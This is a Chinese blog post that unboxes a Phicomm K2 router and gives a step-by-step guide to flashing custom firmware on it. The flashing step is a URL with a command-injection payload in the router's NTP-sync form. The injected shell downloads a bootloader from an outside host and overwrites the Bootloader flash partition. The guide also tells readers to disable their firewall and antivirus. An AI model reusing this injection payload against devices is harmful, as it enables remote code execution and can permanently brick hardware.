关注斐讯路由器已经很久了,并且在张大妈混了这么久,像这种“0元就把路由器拎回家”的活动怎么能不参加!!看大家都玩得那么嗨,我在狗东也入手了一台斐讯K2,399大洋,用了满减券加白条,而且最近狗东在搞活动,晒单还能返还10元京东E卡!免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 这么算下来我还挣了25,这活动不错!免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机

【买就返399元】斐讯K2 1200M智能双频无线路由器 WIFI穿墙 PSG1218399元京东去购买

K2比K1外观更加霸气(4根天线,视觉党的福利啊),无线信号增强,但是399的价格确实水分太多,如果没有这种活动,这款路由器估计也就一百多吧免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 。

一、开箱

这次K2的包装换了,外观更加简洁(估计就是为了省钱免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 )。正面只有一个K2的标识,其他什么都没有!背面是K2的详细信息,然而并没有千兆网口。(0元购机,还要什么自行车?!免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 )

打开盒子,白色外观显得很大气(看不下去了免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 )。

包装简洁,内部也是很简洁的:路由器、电源适配器、说明书、领钱小卡片免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 。

路由器背面有4个百兆LAN口、1个千兆WAN口、reset/wps按键和电源接口。

总的来说这款没花钱的路由器还是很不错的,但是据说原厂固件自带后门,收集个人信息!虽然我的信息已经暴露了,但是对于这种行为很是不爽,所以刷机那是必须的!

二、极简刷机

看过很多值友的刷机教程,但是涉及到路由器出厂固件版本的不同,刷机过程并不能照搬。先说一下我买的路由器版本号:V21.4.5.5,看有的值友是先降级,然后再刷breed,感觉稍微繁琐点,下面介绍一种简单的刷机方法:

提示:你的版本号和我一样!!!其它的没试过,不能保证,请谨慎!免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机

首先,将电脑——路由器——外网连接好,保证电脑能够正常上网。

其次,关闭防火墙、杀毒软件,打开谷歌浏览器(最好使用谷歌浏览器刷机,不容易出现问题),打开网址

/etc_ro/web/index.asp;fi`"" target="_blank">http://192.168.2.1/goform/gra_NTPSyncWithLocal?text_year="2016|`if wget -O /tmp/breed.bin http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin;then mtd_write write /tmp/breed.bin Bootloader;echo breed ok! >/etc_ro/web/index.asp;fi`"

耐心等待一会······看到页面没有反应了,重新登陆路由会显示“breed ok!” 就证明刷breed成功了。

现在我们就可以愉快的刷固件了免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 ,是不是很easy啊!

浏览器输入:192.168.1.1可进入Breed Web控制台

点击恢复出厂设置——》点击“执行”(固件类型默认就行)

分享一下固件:

潘多拉:百度网盘 提取码:ni29

华硕固件:百度网盘 提取码:n2cm

openwrt:百度网盘 提取码:7atk

下载你想刷的固件,点击“固件更新”——》勾选“固件”——》点击“选择文件”,找到你下载的固件,点击“上传”

此时,只要保证不断电,连接不断就OK了!免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 等一会刷完会自动重启的。

我这次刷入的是华硕固件,浏览器输入:192.168.123.1即可进入路由器,默认用户名和密码均是admin。开始各种设置吧免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机

三、总结

刷机要胆大心细,一般不会出现问题的。另外这款路由器经过破解刷入改版固件,功能上更加强大,而且还是不花钱就可以得到的路由器,还要啥自行车啊免费的午餐 — PHICOMM 斐讯 K2 路由器 开箱&刷机 。

路由器
分类:路由器 +关注